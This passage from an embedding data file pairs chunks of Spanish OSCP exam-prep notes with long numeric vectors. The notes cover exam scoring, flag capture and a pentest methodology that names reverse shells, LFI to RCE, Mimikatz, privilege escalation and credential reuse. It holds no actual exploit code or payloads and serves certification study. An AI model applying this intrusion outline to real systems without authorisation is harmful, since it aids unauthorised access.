-0.01624, -0.03353, 0.04216, -0.06775, -0.01363, 0.02406, -0.00368, 0.02888, 0.06774, 0.02927, -0.06865, 0.03783, -0.06802, 0.06138, 0.04806, -0.07011, 0.02821, 0.03389, -0.02151, -0.05495, 0.00638, 0.03601, -0.01665, 0.0008]} +{"tipo": "metodologia", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "texto": "## Composición\n- **Set de Active Directory = 40 puntos seguidos.**\n - 3 máquinas **encadenadas**. Si te atascas en la máquina 1, no avanzas a 2 y 3.\n - **Empieza por aquí con tiempo.** Es todo-o-nada por cadena.\n - Ver Active Directory para el flujo completo.\n- **3 standalones independientes**, 20 pts cada una.\n - `user` (10 pt = `local.txt`) + `root/system` (10 pt = `proof.txt`).\n - **Saca el `user` de las 3 ANTES** de obsesionarte con el root de una.", "v": [0.11281, -0.06337, -0.13475, 0.03014, 0.04254, -0.13491, -0.0378, -0.06655, -0.00137, 0.16091, -0.14878, -0.0753, -0.00758, -0.03526, 0.0173, -0.08052, 0.01514, -0.06494, 0.00742, 0.06795, -0.04792, -0.01353, -0.04958, -0.02873, 0.09108, 0.23837, 0.03299, 0.1165, -0.16987, 0.08188, 0.06151, 0.05203, -0.04094, -0.03174, 0.03763, -0.1282, -0.00141, 0.0426, 0.13333, 0.1206, -0.01643, 0.09413, -0.05543, 0.17429, 0.07035, 0.00539, 0.05763, 0.01021, -0.03104, -0.05405, -0.08427, -0.03726, -0.02457, 0.05489, 0.03632, -0.09908, 0.13294, -0.04032, -0.05731, -0.01588, 0.07604, 0.02585, -0.05966, -0.07154, 0.00961, -0.06076, 0.18244, -0.08901, -0.04976, 0.05757, -0.07407, -0.03428, -0.00615, -0.08125, 0.10128, -0.00174, 0.0779, -0.02981, 0.03755, 0.05553, -0.01969, -0.11175, -0.0296, -0.13912, -0.00614, -0.0723, 0.11659, -0.11936, -0.07052, -0.06432, 0.15, 0.01859, -0.00726, 0.00182, 0.0386, -0.05285, 0.01864, 0.07611, 0.06593, 0.0512, 0.10256, 0.05594, -0.09183, 0.09338, 0.06299, 0.04575, 0.03642, 0.08395, 0.00284, -0.02511, 0.04361, -0.01963, 0.08043, 0.03057, -0.0136, -0.06453, -0.01614, 0.02239, 0.05479, 0.03049, -0.01327, -0.02969, 0.01456, -0.00312, -0.04944, -0.08579, -0.04775, 0.06521, 0.01764, 0.00148, 0.03408, 0.0633, -0.02131, -0.04322, -0.02611, -0.05091, 0.02416, 0.06546, -0.00118, -0.08069, 0.02653, -0.01049, -0.01138, 0.0068, 0.074, 0.02109, 0.06044, -0.10432, -0.05942, 0.05716, 0.04656, 0.09025, 0.05452, 0.07178, -0.0111, 0.02854, 0.05858, -0.02076, 0.00785, 0.00656, 0.03859, 0.01278, 0.00967, 0.04276, -0.06272, 0.05034, -0.02015, -0.01306, 0.02723, -0.03796, -0.03224, 0.01767, -0.08439, -0.08431, -0.00148, -0.12217, 0.04434, -0.08174, -0.04026, 0.06583, -0.0043, -0.01708, -0.02604, -0.01293, -0.00669, -0.0116, -0.00021, 0.0044, 0.05965, 0.00862, 0.03565, 0.00669, -0.02917, -0.02282, 0.0808, -0.0452, 0.00224, -0.0534, 0.02746, -0.05931, -0.01732, 0.07332, 0.02045, -0.01762, -0.00924, 0.00823, -0.00388, 0.00108, 0.0097, -0.00636, 0.00497, 0.03123, 0.04986, -0.02313, -0.04134, -0.06502, -0.01752, 0.02505, -0.04309, -0.00433, 0.02445, 0.07855, 0.01879, -0.00813, -0.01578, -0.04909, 0.06701, -0.00039, 0.10013, 0.02089, -0.07598, 0.05379, 0.04697, -0.049, 0.00819, -0.00572, 0.07385, -0.02627, -0.07317, -0.07999, -0.06108, 0.12075, -0.00305, -0.03738, -0.0926, 0.0033, -0.04437, -0.05092, -0.03322, -0.06804, -0.05602, -0.00387, -0.03234, -0.09388, 0.05191, 0.01661]} +{"tipo": "metodologia", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "texto": "## Pruebas (flags)\n- `local.txt` = prueba de usuario.\n- `proof.txt` = prueba de root/SYSTEM.\n- Cada flag con el **hostname visible** (`ipconfig` / `ifconfig`) en la captura.", "v": [0.07732, -0.04991, -0.20565, -0.21042, 0.1964, -0.1664, -0.02389, -0.02051, 0.05542, 0.07243, -0.11435, 0.02016, -0.02358, -0.03444, -0.00734, 0.01179, -0.00774, -0.09043, 0.00667, -0.04026, -0.02704, -0.02362, -0.08463, -0.00429, 0.0538, 0.06366, -0.03775, 0.03373, -0.15297, -0.1358, 0.02202, -0.03112, 0.02111, -0.00967, -0.12857, -0.04132, 0.02265, 0.05344, 0.01452, 0.141, 0.02146, -0.03936, -0.06345, 0.10669, 0.00821, -0.04895, 0.01869, -0.05571, 0.03302, -0.18112, -0.04746, -0.13436, -0.1053, -0.08788, -0.06053, -0.06579, 0.1259, -0.13562, -0.00147, 0.03719, -0.0686, -0.02445, 0.00888, 0.00262, 0.01539, 0.031, 0.02465, -0.00788, -0.07081, 0.01408, 0.02687, 0.04981, -0.06752, -0.10501, 0.05647, 0.05505, 0.02779, -0.08821, 0.18988, 0.03023, -0.04154, -0.06366, -0.09816, -0.05504, -0.07605, -0.08186, -0.04488, -0.05323, 0.00545, -0.09434, 0.17574, -0.02089, 0.03592, 0.10218, 0.11736, -0.07006, 0.07588, 0.01749, 0.02947, -0.05261, 0.04844, 0.06969, -0.04183, 0.09443, 0.08209, 0.02677, 0.0262, 0.01662, 0.03934, -0.05011, 0.06543, -0.02731, -0.02911, 0.05021, -0.02858, -0.14781, 0.02856, -0.01669, -0.03108, -0.04187, -0.08106, -0.07982, -0.00133, 0.03791, 0.03769, 0.00258, -0.00553, 0.0055, 0.01196, 0.0466, 0.00194, 0.01045, 0.00646, -0.0044, -0.07037, 0.03451, -0.04302, -0.02631, -0.03112, 0.00156, 0.06595, 0.05481, 0.02244, 0.01878, 0.12662, 0.08157, -0.05345, -0.04291, -0.07087, 0.0717, 0.01367, 0.04691, -0.04682, 0.03229, -0.0997, 0.00172, 0.05055, 0.00814, -0.00254, -0.01103, -0.00596, -0.04952, -0.01082, 0.05112, 0.00788, -0.01292, -0.01191, -0.00455, 0.12457, -0.0127, -0.03222, 0.09612, -0.08744, -0.10465, 0.01236, -0.0317, 0.03255, -0.08582, -0.00848, -0.04822, -0.01356, 0.02638, 0.04507, 0.00229, 0.0046, -0.00146, 0.0101, -0.00243, 0.07524, -0.03304, 0.07285, 0.03187, -0.06452, 0.0282, 0.04325, 0.00762, -0.04121, -0.00832, -0.0219, -0.02981, -0.09333, 0.01548, -0.02901, -0.02339, 0.03766, 0.01383, 0.00075, 0.00887, -0.0112, -0.00099, 0.00294, 0.00326, 0.08342, -0.02015, -0.07614, -0.00616, 0.04691, 0.0425, -0.04159, -0.03028, -0.01744, 0.06348, 0.07633, 0.01518, -0.02841, 0.04088, 0.06053, -0.02209, 0.07679, -0.00225, -0.02331, 0.03314, -0.03226, -0.01964, 0.07475, -0.01667, -0.00335, -0.00607, -0.04725, -0.09225, 0.00163, 0.08616, -0.00924, -0.06824, -0.00741, -0.05391, -0.10164, 0.00069, 0.04715, -0.02654, -0.05342, -0.00141, 0.05239, -0.08463, -0.00028, -0.00497]} +{"tipo": "metodologia", "herramienta": "Estructura del examen", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Estructura del examen.md", "texto": "## Anti-pánico\n- Ver Gestión del tiempo y Trampas de enumeración.\n- Sin Reporte OSCP **no apruebas**, aunque saques 100 puntos técnicos.\n\nRelacionado: Metodología OSCP · Reglas de herramientas · OSCP MOC", "v": [-0.11532, -0.13487, 0.02508, -0.22651, 0.00168, -0.18824, 0.03818, 0.04699, -0.0458, 0.12758, -0.03757, -0.00435, 0.09558, -0.01213, 0.07983, 0.10667, 0.00628, -0.01527, 0.05323, 0.0404, -0.09378, -0.13536, -0.1293, 0.06358, 0.17875, 0.12352, -0.00223, -0.15876, -0.0599, -0.06098, -0.01282, 0.0014, -0.03735, 0.01249, -0.08753, 0.00574, -0.09378, -0.10948, 0.12324, 0.15371, -0.06136, -0.00547, -0.04365, 0.08703, 0.22978, -0.11622, 0.13494, 0.1466, -0.02307, -0.02504, -0.10763, -0.08483, -0.16338, -0.04448, -0.07866, 0.04353, 0.03637, 0.07638, -0.02016, -0.0602, -0.02552, 0.14599, -0.06019, -0.09084, 0.03685, -0.04948, -0.03444, -0.08326, -0.01779, 0.10624, -0.00695, 0.02648, -0.04071, -0.0063, 0.05817, -0.15626, 0.02964, 0.01871, 0.17754, -0.0373, -0.00938, -0.03564, 0.02317, 0.0321, -0.07187, -0.09907, 0.11351, 0.02724, -0.07011, -0.0792, 0.04871, 0.04452, 0.04105, 0.00099, 0.05707, -0.12309, 0.02748, 0.03146, 0.0112, 0.01496, 0.00487, 0.01775, -0.01161, 0.05583, -0.06239, 0.07173, 0.10301, -0.01709, 0.05053, 0.0164, 0.01686, 0.03331, 0.00196, 0.03799, -0.08768, -0.0644, 0.03425, -0.01833, -0.02822, -0.00998, -0.00656, 0.08444, -0.03719, -0.01627, -0.00024, -0.02104, 0.03413, 0.05459, 0.07551, 0.00304, -0.04383, -0.03359, -0.04832, -0.00686, -0.01333, -0.00713, -0.07264, -0.02261, 0.02377, -0.10063, -0.04526, 0.08905, -0.01926, 0.01469, -0.00565, -0.04497, -0.01968, -0.01627, -0.0141, 0.00083, 0.03636, 0.00348, -0.02765, 0.0379, 0.03583, -0.04424, -0.05347, 0.07958, -0.08864, -0.00094, 0.04159, -0.00996, 0.06887, 0.01947, 0.04717, 0.06774, 0.05685, 0.07349, -0.01182, -0.02498, -0.00101, -0.00322, -0.06881, 0.04322, -0.05691, -0.08216, 0.02682, -0.0005, -0.051, -0.00332, -0.01128, -0.01493, 0.01977, 0.02463, 0.02432, -0.02991, 0.03037, 0.01813, -0.01655, 0.02941, -0.01886, -0.0755, -0.01332, -0.02473, -0.00139, -0.04141, 0.08417, -0.02437, -0.02182, 0.03479, -0.03163, -0.04509, 0.0145, -0.03882, 0.01764, 0.05187, -0.00139, 0.01194, 0.00245, -0.03766, 0.01005, -0.05772, 0.00542, -0.03598, 0.00035, -0.03935, 0.00623, 0.07468, -0.03681, 0.02728, 0.04099, -0.0079, 0.02283, 0.03241, -0.01695, -0.0271, -0.01224, 0.03021, 0.02569, -0.00643, -0.0447, -0.00788, 0.04778, -0.03914, 0.03474, -0.0244, 0.02094, -0.00357, -0.0187, -0.01028, 0.01972, 0.00544, 0.01913, 0.0172, -0.05918, -0.04328, -0.0355, -0.08911, 0.00104, -0.03689, 0.03874, -0.0715, -0.01095, -0.03291, 0.00175, 0.00139]} +{"tipo": "metodologia", "herramienta": "Metodología OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Metodología OSCP.md", "texto": "# Metodología OSCP\n\n> El truco real del OSCP no es saber 200 técnicas, es tener una **metodología repetible**.\n> La gente suspende por **saltarse pasos** o por **obsesionarse con un vector**, no por desconocimiento técnico.", "v": [-0.00516, -0.1683, -0.20681, -0.09241, -0.06298, -0.14656, 0.02099, -0.03636, 0.06161, 0.01802, -0.09954, 0.01431, 0.11306, 0.01186, 0.11281, 0.02823, 0.07228, -0.00564, 0.07915, -0.01489, -0.07286, -0.14328, -0.1277, 0.04014, 0.1538, 0.03849, -0.04325, -0.08374, -0.08573, -0.09407, -0.08854, 0.10411, -0.00944, -0.07072, -0.05327, 0.01335, -0.05591, -0.10924, -0.03741, 0.11925, -0.06708, -0.00192, -0.03916, 0.10829, 0.14784, -0.09287, 0.05341, 0.08021, -0.00283, 0.02351, 0.04685, 0.04331, -0.07179, -0.04381, -0.08195, -0.03612, 0.09415, 0.02641, 0.03799, -0.05637, 0.10346, 0.01276, -0.03648, -0.06917, 0.0931, -0.0142, 0.09747, -0.06582, -0.12717, 0.05164, 0.00449, 0.04544, -0.10334, 0.01912, 0.1258, -0.02286, 0.05267, 0.00939, 0.17786, -0.07296, -0.09448, -0.05594, 0.00588, 0.06985, -0.07064, -0.07525, 0.09727, -0.05188, -0.0705, -0.16734, 0.02779, 0.0458, 0.04906, -0.06842, 0.00039, -0.05087, 0.10059, 0.02432, -0.01751, 0.11812, -0.00292, 0.06937, -0.08968, 0.05002, -0.01673, 0.03928, 0.1305, -0.0279, 0.00552, -0.07139, -0.04562, 0.07983, -0.04418, 0.04861, -0.10504, -0.09503, 0.01142, 0.02828, -0.0495, 0.01414, -0.07113, 0.06428, -0.02305, 0.00155, -0.03153, -0.06303, 0.00993, 0.0954, 0.05897, 0.03815, -0.03237, -0.03565, -0.03667, -0.03593, -0.03968, -0.01801, 0.00141, -0.01626, -0.01203, -0.10858, 0.03409, 0.08546, -0.03746, -0.07527, 0.05827, -0.05618, 0.04729, -0.07087, -0.0692, 0.02402, 0.01894, 0.03609, 0.0375, 0.04447, 0.01473, -0.08932, 0.06336, -0.05757, -0.04433, 0.13718, 0.02233, 0.07107, 0.06072, -0.02642, -0.0609, 0.04028, 0.00488, -0.02097, -0.04534, 0.04713, -0.02503, 0.00335, -0.04891, -0.02441, 0.01104, -0.02463, -0.02032, -0.05463, -0.00446, -0.01256, -0.02235, 0.00452, 0.06133, -0.02072, 0.05158, -0.02597, -0.02788, 0.03067, 0.0326, 0.08091, -0.00505, -0.04399, -0.0559, -0.00338, -0.08214, -0.00888, 0.05328, -0.03947, 0.04736, 0.03952, -0.05747, -0.02051, -0.02582, 0.00298, -0.02923, -0.01969, -0.02232, -0.00546, -0.10283, -0.00548, 0.0367, -0.07174, 0.03152, -0.03177, 0.0445, -0.04608, -0.05781, -0.00488, -0.00299, 0.02623, 0.04863, 0.02926, 0.04775, 0.07617, -0.01045, 0.02491, -0.00466, 0.01628, 0.0317, 0.05195, -0.05658, 0.0001, 0.05954, -0.0392, 0.03391, 0.03125, 0.01892, -0.03935, -0.02685, -0.07685, 0.01355, 0.00599, 0.00015, -0.03823, -0.03693, -0.06423, -0.04124, -0.0488, 0.06614, -0.02279, 0.02542, -0.02325, -0.03547, -0.05983, -0.00573, -0.05691]} +{"tipo": "metodologia", "herramienta": "Metodología OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Metodología OSCP.md", "texto": "## El bucle\n```\nEnumeración exhaustiva → vector → foothold →\nPrivEsc con script automatizado + revisión manual →\ndocumentar antes de pasar a la siguiente máquina\n```", "v": [-0.0665, -0.01762, -0.16205, -0.17121, -0.07139, -0.18035, -0.01049, -0.05651, -0.04277, -0.10924, -0.11217, -0.08564, -0.0241, 0.03473, -0.02049, -0.05157, 0.08054, -0.18584, 0.03842, 0.08494, -0.01347, 0.0502, -0.01803, 0.01302, 0.07221, 0.0074, -0.15255, 0.15795, -0.14287, -0.04527, 0.01026, 0.20554, -0.00078, -0.11642, -0.02572, -0.02797, 0.16433, -0.04177, -0.03008, 0.13967, 0.00128, 0.03731, -0.08753, 0.11442, 0.04261, -0.09421, 0.07515, 0.06541, 0.00283, -0.04034, -0.00096, -0.01746, -0.08911, 0.08208, 0.04386, -0.14066, 0.13056, -0.03706, 0.00573, -0.02409, 0.09205, 0.01272, -0.05587, 0.04099, -0.00958, 0.04218, 0.10797, -0.11238, -0.04166, 0.04078, -0.0322, 0.03785, -0.08097, -0.0427, 0.03361, -0.0746, 0.05292, 0.02814, 0.09189, 0.13025, -0.05031, -0.05883, 0.01012, -0.02409, -0.07029, 0.01961, 0.07095, -0.03787, 0.03292, -0.07608, 0.07644, 0.03577, -0.03101, -0.02378, 0.16229, 0.0042, 0.05531, 0.02611, -0.05722, -0.04675, 0.08736, 0.00838, 0.03337, 0.08051, 0.07362, 0.06513, 0.03344, -0.00997, -0.05462, -0.01081, 0.0284, 0.06894, -0.04528, -0.02042, -0.09405, 0.06449, -0.09877, 0.04206, -0.04063, 0.01534, 0.09778, 0.00163, -0.03014, -0.13752, 7e-05, -0.05724, 0.01849, 0.10676, 0.03457, 0.0419, 0.05423, 0.03276, -0.10965, -0.0583, 0.02017, -0.00925, -0.02673, 0.06369, -0.04778, -0.13254, 0.03276, -0.01538, 0.00213, 0.06738, 0.02585, -0.07886, 0.01044, -0.06967, 0.05142, -0.01821, -0.02922, 0.01173, 0.08079, 0.02305, 0.06801, 0.00298, 0.04685, -0.01618, -0.07438, -0.00386, 0.05899, -0.02409, -0.08225, -0.06886, 0.06145, 0.04577, 0.00716, -0.01229, -0.02884, -0.05614, 0.05797, -0.07847, -0.00053, -0.01419, 0.05736, 0.00168, 0.01121, -0.06645, 0.02308, 0.02635, 0.06665, 0.02829, 0.03537, -0.0154, 0.02333, -0.01833, -0.01095, -0.01217, 0.0682, 0.06629, 0.04517, 0.02454, -0.01843, -0.07341, 0.07263, -0.0469, -0.03073, 0.03271, 0.04668, -0.04547, -0.01029, -0.03056, -0.06103, 0.02316, 0.03259, 0.04329, 0.00431, -0.09281, -0.01614, 0.00764, -0.01977, 0.02765, 0.04729, -0.00353, -0.01622, -0.03448, 0.00824, 0.02533, -0.06417, -0.03144, 0.03605, -0.0207, 0.01027, 0.00064, -0.011, 0.02088, 0.12075, 0.01431, 0.00018, -0.02913, -0.08267, -0.00015, -0.01797, 0.04885, -0.0132, 0.04062, 0.04367, -0.01281, -0.00881, -0.07081, 0.03262, 0.05096, 0.01271, -0.0116, -0.06562, -0.03691, 0.02827, -0.01561, 0.02968, 0.01153, 0.00685, -0.02561, -0.08426, -0.03277, 0.00366, 0.01533]} +{"tipo": "metodologia", "herramienta": "Metodología OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Metodología OSCP.md", "texto": "## Pasos\n1. **Enumera a fondo** → Enumeración (no asumas nada, mira Puertos olvidados).\n2. **Encuentra el vector** → web (Enumeración web, SQL injection, LFI a RCE, File upload bypass) o servicio.\n3. **Foothold** → Reverse shell estabilizada (Estabilizar shell TTY).\n4. **Privesc** → script automatizado (PEASS-ng) **+** revisión manual (Privesc Linux / Privesc Windows).\n5. **Loot y pivot** → Mimikatz, Movimiento lateral, Active Directory.\n6. **Documenta EN VIVO** → Reporte OSCP.", "v": [-0.10745, -0.18142, -0.25454, -0.13891, 0.0488, -0.13533, -0.0398, -0.18104, -0.09293, -0.00522, 0.00332, -0.08556, 0.06236, -0.07806, 0.06944, 0.01554, -0.01804, -0.1509, -0.03016, 0.04499, -0.09374, 0.10788, -0.1315, 0.00729, 0.09496, 0.21712, -0.03452, 0.04447, -0.05379, -0.03587, 0.03741, 0.04731, -0.017, 0.00836, 0.00291, -0.01173, 0.08665, -0.0573, 0.06863, 0.18359, 0.14096, 0.13472, -0.03198, 0.12657, 0.06219, -0.16388, 0.12318, 0.02878, 0.09931, -0.0345, -0.00555, -0.00478, -0.08338, -0.01374, 0.01738, 0.03918, 0.14368, -0.02246, -0.01008, -0.01993, -0.01004, 0.01191, -0.02264, -0.05324, 0.04591, -0.02629, 0.02404, -0.03209, -0.1066, 0.07421, 0.05145, 0.08511, -0.01703, -0.0795, 0.07933, -0.05317, -0.00374, 0.01437, 0.05756, 0.08317, -0.01878, -0.0574, -0.03331, -0.03369, -0.05122, -0.1276, -0.00976, -0.07421, -0.05185, -0.00375, 0.151, -0.0042, -0.09579, 0.05944, 0.0124, -0.03369, -0.0382, 0.06125, -0.01196, -0.10048, 0.04249, 0.09058, -0.03744, 0.06383, 0.11242, 0.01144, 0.08846, -0.05111, 0.03987, 0.05315, 0.07113, 0.03165, -0.00709, -6e-05, -0.06886, 0.06007, -0.03935, -0.0044, 0.03324, -0.03751, 0.02507, -0.02654, -0.02319, -0.03218, -0.08373, -0.01529, -0.0648, 0.11366, 0.03069, 0.02963, 0.0282, -0.01129, -0.09817, -0.0585, -0.05948, 0.03592, 0.02833, 0.02557, 0.00071, -0.03282, 0.03566, 0.00233, 0.00691, 0.10563, 0.07909, 0.01822, 0.05519, -0.01708, -0.0258, 0.05711, 0.00119, 0.0808, 0.02219, -0.00776, 0.03869, -0.03092, 0.01621, -0.02553, -0.09552, 0.01547, 0.07302, 0.04141, 0.02469, -0.00674, -0.06415, -0.00532, 0.02529, -0.02946, 0.0028, -0.03015, 0.04376, -0.03074, -0.04046, -0.06083, -0.00128, -0.11729, -0.00029, -0.04678, -0.03637, 0.04214, 0.04715, -0.02145, 0.01909, 0.02553, 0.02131, -0.01853, 0.04117, 0.00036, 0.03123, -0.01322, 0.06002, -0.02745, 0.00426, -0.03051, 0.03662, 0.02866, -0.04555, -0.11233, 0.01518, -0.06192, -0.04343, 0.01432, -0.03565, -0.05008, 0.03252, -0.0072, 0.01319, 0.00228, -0.01118, -0.02152, -0.04453, 0.03584, 0.04246, 0.02592, -0.01454, -0.03765, 0.02369, 0.04361, -0.02789, 0.03882, -0.0203, 0.03218, 0.07478, -0.03503, 0.03653, -0.01159, 0.04276, -0.01915, -0.01103, -0.03405, -0.01828, -0.027, 0.05187, -0.0608, -0.00468, 0.02736, 0.03096, 0.02121, 0.00765, -0.02195, 0.03702, 0.05408, -0.00397, -0.0418, -0.0485, -0.07035, -0.03435, 0.01769, 0.0005, 0.00743, -0.0529, -0.03006, -0.07183, -0.11891, 0.00574, -0.01966]} +{"tipo": "metodologia", "herramienta": "Metodología OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Metodología OSCP.md", "texto": "## Reglas de oro\n- **Reutiliza credenciales** siempre: una pass de un user suele valer en otros hosts y servicios.\n- **1.5h sin progreso = cambia de máquina** (ver Gestión del tiempo).\n- Captura todo mientras lo haces, no al final.\n\nRelacionado: Estructura del examen · Reglas de herramientas · OSCP MOC", "v": [-0.03886, -0.06586, -0.1333, -0.09276, 0.01692, -0.11284, -0.08451, 0.05544, -0.01267, -0.11805, -0.29785, -0.12183, 0.0082, 0.05784, 0.08072, 0.09101, -0.03157, 0.07559, -0.05966, 0.03747, -0.05978, 0.00336, -0.10164, 0.00433, 0.02426, 0.1034, 0.00529, -0.0817, -0.14905, 0.05341, 0.08125, 0.06777, -0.01516, -0.14766, -0.07087, 0.01537, -0.06619, 0.07926, 0.06593, 0.12574, 0.03329, 0.1029, -0.10035, 0.11994, 0.20695, -0.12736, 0.11844, 0.0701, -0.04952, 0.00126, -0.03664, -0.06724, -0.12607, 0.03759, 0.03373, -0.04692, 0.08128, 0.04073, -0.03184, -0.11704, 0.00318, 0.08139, -0.00308, 0.04768, 0.11793, -0.08868, -0.04157, -0.10986, -0.08526, 0.07537, -0.08686, 0.05146, -0.00392, -0.02791, 0.03382, -0.10373, 0.03634, -0.02173, 0.02651, 0.00375, -0.05928, -0.0215, -0.09987, 0.00012, -0.06853, -0.04361, 0.05611, -0.0971, -0.04481, -0.01608, 0.0008, 0.07596, 0.06632, 0.00454, -0.03074, -0.03557, -0.00125, 0.01159, 0.02014, -0.01115, 0.14755, -0.00918, 0.04804, 0.0723, -0.04279, 0.07324, 0.06455, -0.07172, 0.05321, -0.02453, 0.07616, 0.04052, 0.00295, -0.05514, 0.00299, -0.02075, -0.00016, -0.01958, -0.04125, -0.05906, 0.01934, -0.06677, 0.03659, -0.03589, 0.00879, -0.03187, -0.01618, 0.05742, 0.05259, -0.00684, -0.08555, 0.00489, -0.12948, -0.03233, 0.02876, 0.00476, 0.07306, 0.00478, 0.01331, -0.0809, 0.01693, 0.05392, -0.01426, 0.03591, 0.04388, -0.04238, 0.04117, -0.14783, -0.11287, 0.00398, 0.04217, 0.01868, 0.03963, 0.07834, -0.01617, 0.00714, -0.02261, -0.03374, -0.02937, 0.04325, -0.02039, -0.00716, 0.05291, 0.00376, -0.02456, 0.04348, 0.01323, 0.01837, 0.00808, -0.05029, 0.03161, -0.05244, -0.08471, 0.03272, -0.03363, -0.07234, -0.02893, -0.06793, -0.06313, -0.12725, 0.0319, 0.05446, -0.00118, 0.0452, 0.00626, -0.00651, -0.01261, -0.01078, 0.021, -0.01788, 0.0686, -0.06093, -0.03694, 0.04557, 0.03867, 0.01915, -0.0263, -0.10782, -0.02958, -0.02349, -0.05649, -0.03864, -0.02521, -0.02392, -0.04367, 0.05916, 0.02357, 0.0252, -0.00521, 0.05502, 0.04821, 0.02172, 0.02619, -0.01915, -0.0742, -0.04946, 0.03865, 0.04362, -0.04155, 0.00637, 0.02469, 0.0053, 0.03987, -0.01371, 0.02948, 0.00719, 0.04594, 0.06615, 0.02362, 0.00843, -0.00705, 0.00311, 0.02539, -0.09516, 0.06236, -0.01845, 0.03076, -0.03253, -0.03333, -0.10342, 0.05097, 0.03913, 0.01388, -0.01599, -0.08698, 0.04393, -0.02199, -0.00089, 0.02155, -0.07979, -0.08456, -0.02974, -0.00673, -0.08466, 0.01049, -0.01627]} +{"tipo": "metodologia", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "texto": "# Reporte OSCP\n\n> **Sin reporte no apruebas**, aunque saques 100 puntos técnicos. Se entrega hasta 24h después del examen.", "v": [0.03393, -0.02604, -0.06452, -0.11234, 0.09842, -0.28815, 0.02643, -0.08246, -0.07258, 0.07138, -0.19908, 0.0199, -0.02867, -0.08893, 0.11948, 0.06832, 0.00854, 0.03049, 0.06681, 0.0221, 0.02249, -0.07807, -0.05373, 0.022, 0.13523, 0.10545, 0.01808, 0.03931, -0.00469, -0.1286, 0.10327, -0.03038, 0.03838, 0.0065, 0.01579, 0.01996, -0.05292, -0.03349, 0.07077, 0.07329, 0.09835, -0.04903, 0.00645, -0.02617, 0.201, -0.11652, 0.07247, 0.20639, -0.01344, -0.20497, 0.02692, 0.05678, -0.07277, 0.00239, -0.08673, 0.01752, 0.04118, 0.08872, 0.10203, -0.105, 0.0585, 0.13721, 0.04697, -0.17972, 0.10449, 0.00738, 0.03657, -0.07165, -0.04695, 0.02862, -0.03958, 0.02225, 0.04826, -0.08506, -0.08276, -0.11489, -0.08287, 0.046, 0.01193, -0.04563, 0.04401, 0.00852, -0.00535, -0.06748, -0.02744, -0.03988, 0.03948, -0.02051, -0.07928, -0.05572, 0.06943, 0.06336, 0.06107, 0.05564, 0.02768, -0.06756, 0.04556, -0.01311, -0.01002, -0.11543, 0.01037, 0.0198, 0.02509, 0.04758, -0.04649, 0.0927, 0.08374, 0.00659, -0.01317, 0.04169, -0.0242, 0.08646, -0.03314, 0.03333, -0.05911, -0.03619, -0.0453, -0.01422, -0.11182, 0.10977, -0.02475, 0.11877, 0.02349, 0.05892, -0.08313, -0.04139, 0.03585, -0.01855, 0.10363, 0.00586, 0.07543, 0.05541, -0.03259, -0.00563, -0.01976, 0.0298, -0.05754, -0.06531, -0.0583, -0.05877, 0.05242, 0.08903, 0.01021, 0.08375, -0.03691, 0.03321, -0.07351, -0.02459, -0.07114, 0.03938, -0.00699, -0.00649, -0.04882, 0.02186, 0.01566, 0.01097, -0.01116, 0.03198, -0.07561, 0.01008, 0.01857, -0.0594, 0.11324, 0.04397, 0.00942, 0.13734, 0.04051, 0.00193, 0.04967, -0.04472, -0.03881, -0.00116, -0.06594, -0.05419, -0.0151, -0.08456, 0.01115, 0.04113, -0.05862, -0.01211, -0.03773, -0.00601, -0.00249, 0.0012, 0.00253, 0.01803, 0.03353, 0.00894, 0.02995, 0.02873, 0.02989, 0.00568, -0.00344, -0.0403, 0.00871, 0.00491, 0.05395, -0.02728, 0.03294, -0.00382, -0.01234, 0.02719, -0.06713, -0.01512, -0.00548, 0.04707, -0.04135, 0.01646, 0.04698, -0.02062, -0.04287, -0.06205, -0.00408, -0.07242, 0.01936, -0.05578, 0.02408, 0.05331, -0.02772, -0.01144, 0.00845, -0.04512, 0.0189, -0.00216, -0.01853, -0.0059, 0.03735, 0.05768, 0.07698, -0.00325, -0.06615, 0.01004, -0.01193, -0.05901, 0.05412, -0.02794, 0.01015, 0.04563, 0.02551, 0.01676, 0.05302, 0.04289, -0.03179, 0.0298, -0.05589, -0.0036, -0.01174, -0.06928, -0.00171, -0.02793, 0.03268, -0.00524, 0.0446, 0.00397, 0.00885, -0.0128]} +{"tipo": "metodologia", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "texto": "## Qué necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarás al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada máquina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusión leyendo el reporte.", "v": [0.01477, 0.03208, -0.26467, -0.1419, 0.16858, -0.1766, -0.0128, 0.01259, 0.00238, -0.00241, -0.10265, -0.06767, -0.00028, 0.01797, 0.08058, 0.06701, 0.04727, -0.03895, 0.04323, -0.0345, -0.01072, 0.02318, -0.05002, 0.02769, 0.04733, 0.06837, 0.01209, 0.02233, -0.18421, -0.10526, 0.02234, 0.00221, 0.02355, -0.03976, -0.14395, -0.06764, -0.00191, 0.05279, -0.08581, 0.16344, 0.02255, 0.04699, -0.16295, 0.10641, 0.05357, -0.0837, 0.02944, -0.02478, 0.07086, -0.07476, -0.04733, -0.08113, -0.10168, -0.09688, -0.04262, -0.07197, 0.17592, -0.10851, 0.04007, -0.01162, -0.08722, 0.02102, 0.01265, 0.02582, 0.00446, 0.00306, -0.01543, -0.07238, -0.04049, 0.0425, -0.03629, 0.05307, -0.00265, -0.03014, 0.12384, 0.01006, 0.02784, -0.09289, 0.1911, 0.03413, -0.06831, -0.1085, -0.13447, -0.06367, -0.05159, -0.04282, 0.02248, -0.06838, -0.03979, -0.12242, 